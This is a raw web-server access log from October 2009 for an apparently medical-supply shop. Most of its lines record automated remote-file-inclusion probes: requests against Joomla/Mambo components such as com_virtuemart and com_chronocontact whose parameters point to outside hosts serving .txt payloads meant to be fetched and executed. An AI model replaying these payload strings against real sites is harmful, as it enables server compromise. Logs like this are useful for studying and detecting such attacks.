76.28.189.86 - - [18/Oct/2009:05:10:44 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.28.189.86 - - [18/Oct/2009:05:10:44 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.28.189.86 - - [18/Oct/2009:05:10:44 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.28.189.86 - - [18/Oct/2009:05:10:44 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.28.189.86 - - [18/Oct/2009:05:10:44 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.28.189.86 - - [18/Oct/2009:05:10:44 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.28.189.86 - - [18/Oct/2009:05:10:44 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.28.189.86 - - [18/Oct/2009:05:10:44 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.28.189.86 - - [18/Oct/2009:05:10:44 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.28.189.86 - - [18/Oct/2009:05:10:56 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L2172D64640B90000B06908H+M37+ENG HTTP/1.1" 200 38024 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.28.189.86 - - [18/Oct/2009:05:10:58 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.28.189.86 - - [18/Oct/2009:05:11:28 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):scurbs HTTP/1.1" 200 38016 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
209.59.12.99 - - [18/Oct/2009:05:11:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
95.211.14.134 - - [18/Oct/2009:05:12:21 -0400] "GET /logs/access_log.Q109090300%20%20//includes/function_core.php?web_root=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
95.211.14.134 - - [18/Oct/2009:05:12:21 -0400] "GET /logs//includes/function_core.php?web_root=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
95.211.14.134 - - [18/Oct/2009:05:12:21 -0400] "GET /logs/access_log.Q109092000%20%20//includes/function_core.php?web_root=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
95.211.14.134 - - [18/Oct/2009:05:12:21 -0400] "GET //includes/function_core.php?web_root=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
95.211.14.134 - - [18/Oct/2009:05:12:21 -0400] "GET //includes/function_core.php?web_root=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
95.211.14.134 - - [18/Oct/2009:05:12:21 -0400] "GET /logs/access_log.Q109092000%20%20//includes/function_core.php?web_root=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
95.211.14.134 - - [18/Oct/2009:05:12:21 -0400] "GET /logs/access_log.Q109090300%20%20//includes/function_core.php?web_root=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
95.211.14.134 - - [18/Oct/2009:05:12:21 -0400] "GET /logs//includes/function_core.php?web_root=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
94.75.245.36 - - [18/Oct/2009:05:12:24 -0400] "GET /logs/access_log.Q109082400//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
94.75.245.36 - - [18/Oct/2009:05:12:24 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
94.75.245.36 - - [18/Oct/2009:05:12:24 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
77.222.131.59 - - [18/Oct/2009:05:12:24 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
77.222.131.59 - - [18/Oct/2009:05:12:24 -0400] "GET /logs/access_log.Q109082400//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
77.222.131.59 - - [18/Oct/2009:05:12:24 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
76.28.189.86 - - [18/Oct/2009:05:12:35 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical%20scrubs HTTP/1.1" 200 38025 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
220.125.237.35 - - [18/Oct/2009:05:12:57 -0400] "GET /logs/access_log.Q109091700/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
95.211.14.134 - - [18/Oct/2009:05:13:20 -0400] "GET /logs/access_log.Q109090300//includes/function_core.php?web_root=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
95.211.14.134 - - [18/Oct/2009:05:13:20 -0400] "GET /logs/access_log.Q109092000//includes/function_core.php?web_root=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
95.211.14.134 - - [18/Oct/2009:05:13:20 -0400] "GET /logs/access_log.Q109092000//includes/function_core.php?web_root=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
95.211.14.134 - - [18/Oct/2009:05:13:20 -0400] "GET /logs/access_log.Q109090300//includes/function_core.php?web_root=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
72.30.78.230 - - [18/Oct/2009:05:13:28 -0400] "GET /logs/error_log.Q109101000 HTTP/1.0" 200 3293959 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
220.125.237.35 - - [18/Oct/2009:05:13:31 -0400] "GET /logs/access_log.Q109082600/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
151.8.79.19 - - [18/Oct/2009:05:13:41 -0400] "GET /logs/access_log.Q109071600/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
151.8.79.19 - - [18/Oct/2009:05:13:41 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
151.8.79.19 - - [18/Oct/2009:05:13:41 -0400] "GET /logs/access_log.Q109053000/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
151.8.79.19 - - [18/Oct/2009:05:14:00 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
151.8.79.19 - - [18/Oct/2009:05:14:00 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
151.8.79.19 - - [18/Oct/2009:05:14:01 -0400] "GET /logs/access_log.Q109071600/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
72.30.78.230 - - [18/Oct/2009:05:13:30 -0400] "GET /logs/error_log.Q109101000 HTTP/1.0" 200 3293959 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
151.8.79.19 - - [18/Oct/2009:05:14:08 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
151.8.79.19 - - [18/Oct/2009:05:14:08 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
151.8.79.19 - - [18/Oct/2009:05:14:13 -0400] "GET /logs/access_log.Q109071600/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
147.46.116.207 - - [18/Oct/2009:05:14:19 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
147.46.116.207 - - [18/Oct/2009:05:14:20 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
147.46.116.207 - - [18/Oct/2009:05:14:20 -0400] "GET /logs/access_log.Q109070700%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
76.28.189.86 - - [18/Oct/2009:05:14:59 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical%20scrubs HTTP/1.1" 200 38025 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
128.252.27.10 - - [18/Oct/2009:05:15:43 -0400] "GET /main.php?x=http://www.eggsactrace.com/mambo/id.txt??? HTTP/1.1" 404 206 "-" "libwww-perl/5.805"
128.252.27.10 - - [18/Oct/2009:05:15:43 -0400] "GET /logs/main.php?x=http://www.eggsactrace.com/mambo/id.txt??? HTTP/1.1" 404 211 "-" "libwww-perl/5.805"
128.252.27.10 - - [18/Oct/2009:05:15:43 -0400] "GET /logs/access_log.Q109081300/main.php?x=http://www.eggsactrace.com/mambo/id.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
128.252.27.10 - - [18/Oct/2009:05:15:47 -0400] "GET /logs/error_log.Q109081300/main.php?x=http://www.eggsactrace.com/mambo/id.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
128.252.27.10 - - [18/Oct/2009:05:15:54 -0400] "GET /logs/access_log.Q109063000//?mosConfig_absolute_path=http://www.eggsactrace.com/mambo/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
128.252.27.10 - - [18/Oct/2009:05:15:54 -0400] "GET //?mosConfig_absolute_path=http://www.eggsactrace.com/mambo/id.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
128.252.27.10 - - [18/Oct/2009:05:15:54 -0400] "GET /logs//?mosConfig_absolute_path=http://www.eggsactrace.com/mambo/id.txt??? HTTP/1.1" 200 22327 "-" "libwww-perl/5.805"
65.172.143.253 - - [18/Oct/2009:05:16:06 -0400] "GET /logs/access_log.Q109081300/main.php?x=http://www.eggsactrace.com/mambo/id.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
65.172.143.253 - - [18/Oct/2009:05:16:06 -0400] "GET /logs/main.php?x=http://www.eggsactrace.com/mambo/id.txt??? HTTP/1.1" 404 211 "-" "libwww-perl/5.805"
65.172.143.253 - - [18/Oct/2009:05:16:06 -0400] "GET /main.php?x=http://www.eggsactrace.com/mambo/id.txt??? HTTP/1.1" 404 206 "-" "libwww-perl/5.805"
65.172.143.253 - - [18/Oct/2009:05:16:10 -0400] "GET /logs/error_log.Q109081300/main.php?x=http://www.eggsactrace.com/mambo/id.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
65.172.143.253 - - [18/Oct/2009:05:16:17 -0400] "GET /logs/access_log.Q109063000//?mosConfig_absolute_path=http://www.eggsactrace.com/mambo/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
65.172.143.253 - - [18/Oct/2009:05:16:17 -0400] "GET //?mosConfig_absolute_path=http://www.eggsactrace.com/mambo/id.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
65.172.143.253 - - [18/Oct/2009:05:16:17 -0400] "GET /logs//?mosConfig_absolute_path=http://www.eggsactrace.com/mambo/id.txt??? HTTP/1.1" 200 22327 "-" "libwww-perl/5.805"
128.252.27.10 - - [18/Oct/2009:05:16:25 -0400] "GET /logs/access_log.Q109071900//?mosConfig_absolute_path=http://www.eggsactrace.com/mambo/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
65.172.143.253 - - [18/Oct/2009:05:16:28 -0400] "GET /logs/access_log.Q109071900//?mosConfig_absolute_path=http://www.eggsactrace.com/mambo/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
209.59.12.99 - - [18/Oct/2009:05:17:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.236.47.182 - - [18/Oct/2009:05:18:00 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
222.236.47.182 - - [18/Oct/2009:05:18:00 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
222.236.47.182 - - [18/Oct/2009:05:18:00 -0400] "GET /logs/access_log.Q109082400//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
66.249.71.152 - - [18/Oct/2009:05:18:36 -0400] "GET /logs/access_log.Q108081501 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.152 - - [18/Oct/2009:05:18:36 -0400] "GET /logs/access_log.Q108083101 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.152 - - [18/Oct/2009:05:18:37 -0400] "GET /logs/access_log.Q108070801 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.152 - - [18/Oct/2009:05:18:37 -0400] "GET /logs/access_log.Q107122301 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
210.110.97.12 - - [18/Oct/2009:05:18:38 -0400] "GET /logs/access_log.Q109100400//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
210.110.97.12 - - [18/Oct/2009:05:18:43 -0400] "GET /logs/access_log.Q109100400//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
189.72.11.130 - - [18/Oct/2009:05:18:47 -0400] "GET /index.php?pag=http://fffmatheus.justfree.com/safeof.txt??????? HTTP/1.1" 404 207 "-" "libwww-perl/5.808"
151.8.79.19 - - [18/Oct/2009:05:18:53 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
151.8.79.19 - - [18/Oct/2009:05:18:53 -0400] "GET /logs/access_log.Q109070600%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
151.8.79.19 - - [18/Oct/2009:05:18:55 -0400] "GET /logs/access_log.Q109051500%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
65.172.143.253 - - [18/Oct/2009:05:19:22 -0400] "GET /logs/access_log.Q109063000%20//?mosConfig_absolute_path=http://www.eggsactrace.com/mambo/id.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
128.252.27.10 - - [18/Oct/2009:05:20:09 -0400] "GET /logs/access_log.Q109063000%20//?mosConfig_absolute_path=http://www.eggsactrace.com/mambo/id.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
123.125.66.62 - - [18/Oct/2009:05:20:41 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
125.251.147.194 - - [18/Oct/2009:05:20:43 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mistresslorisdungeon.com//chat/inc/nyawa.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:05:20:43 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mistresslorisdungeon.com//chat/inc/nyawa.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:05:20:43 -0400] "GET /logs/access_log.Q109082400//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mistresslorisdungeon.com//chat/inc/nyawa.txt?? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
110.45.147.248 - - [18/Oct/2009:05:21:13 -0400] "GET /logs/access_log.Q109052200/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
110.45.147.248 - - [18/Oct/2009:05:21:13 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/idi.txt??? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
110.45.147.248 - - [18/Oct/2009:05:21:13 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/idi.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.79"
110.45.147.248 - - [18/Oct/2009:05:21:13 -0400] "GET /logs/error_log.Q109052200/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/idi.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.79"
220.181.7.71 - - [18/Oct/2009:05:21:32 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
125.251.147.194 - - [18/Oct/2009:05:21:49 -0400] "GET /logs/error_log.Q109082400//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mistresslorisdungeon.com//chat/inc/nyawa.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Oct/2009:05:22:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.71.152 - - [18/Oct/2009:05:23:08 -0400] "GET /logs/access_log.Q109100300 HTTP/1.1" 200 2716025 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.152 - - [18/Oct/2009:05:23:44 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0109C2411F79790007D806K+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
211.48.121.149 - - [18/Oct/2009:05:24:38 -0400] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.1004bang.net/1004bangmall/dataroom/review/idxx.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
211.48.121.149 - - [18/Oct/2009:05:24:44 -0400] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.1004bang.net/1004bangmall/dataroom/review/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.48.121.149 - - [18/Oct/2009:05:24:44 -0400] "GET /logs/access_log.Q109061800//modules/agendax/addevent.inc.php?agendax_path=http://www.1004bang.net/1004bangmall/dataroom/review/idxx.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
211.48.121.149 - - [18/Oct/2009:05:24:57 -0400] "GET /logs/access_log.Q109093000//modules/agendax/addevent.inc.php?agendax_path=http://www.1004bang.net/1004bangmall/dataroom/review/idxx.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
147.46.116.207 - - [18/Oct/2009:05:25:49 -0400] "GET /logs/access_log.Q109070700/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:05:26:16 -0400] "GET /logs/access_log.Q109082400%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mistresslorisdungeon.com//chat/inc/nyawa.txt?? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:05:26:41 -0400] "GET /logs/error_log.Q109082400%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mistresslorisdungeon.com//chat/inc/nyawa.txt?? HTTP/1.1" 404 302 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Oct/2009:05:27:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.130.203.99 - - [18/Oct/2009:05:27:30 -0400] "GET /main.php?x=http://www.eggsactrace.com/mambo/id.txt??? HTTP/1.1" 404 206 "-" "libwww-perl/5.803"
203.130.203.99 - - [18/Oct/2009:05:27:32 -0400] "GET /logs/access_log.Q109081300/main.php?x=http://www.eggsactrace.com/mambo/id.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
203.130.203.99 - - [18/Oct/2009:05:27:32 -0400] "GET /logs/error_log.Q109081300/main.php?x=http://www.eggsactrace.com/mambo/id.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.803"
203.130.203.99 - - [18/Oct/2009:05:27:45 -0400] "GET /logs/main.php?x=http://www.eggsactrace.com/mambo/id.txt??? HTTP/1.1" 404 211 "-" "libwww-perl/5.803"
64.150.183.219 - - [18/Oct/2009:05:27:45 -0400] "GET /logs/_conf/core/common-tpl-vars.php?confdir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
64.150.183.219 - - [18/Oct/2009:05:27:45 -0400] "GET /_conf/core/common-tpl-vars.php?confdir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
64.150.183.219 - - [18/Oct/2009:05:27:45 -0400] "GET /logs/access_log.Q109062900/_conf/core/common-tpl-vars.php?confdir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
64.150.183.219 - - [18/Oct/2009:05:27:48 -0400] "GET /logs/access_log.Q109062800/_conf/core/common-tpl-vars.php?confdir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
64.150.183.219 - - [18/Oct/2009:05:27:50 -0400] "GET /_conf/core/common-tpl-vars.php?confdir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
64.150.183.219 - - [18/Oct/2009:05:27:50 -0400] "GET /logs/access_log.Q109062900/_conf/core/common-tpl-vars.php?confdir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
64.150.183.219 - - [18/Oct/2009:05:27:50 -0400] "GET /logs/_conf/core/common-tpl-vars.php?confdir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
64.150.183.219 - - [18/Oct/2009:05:27:52 -0400] "GET /_conf/core/common-tpl-vars.php?confdir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
64.150.183.219 - - [18/Oct/2009:05:27:52 -0400] "GET /logs/_conf/core/common-tpl-vars.php?confdir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
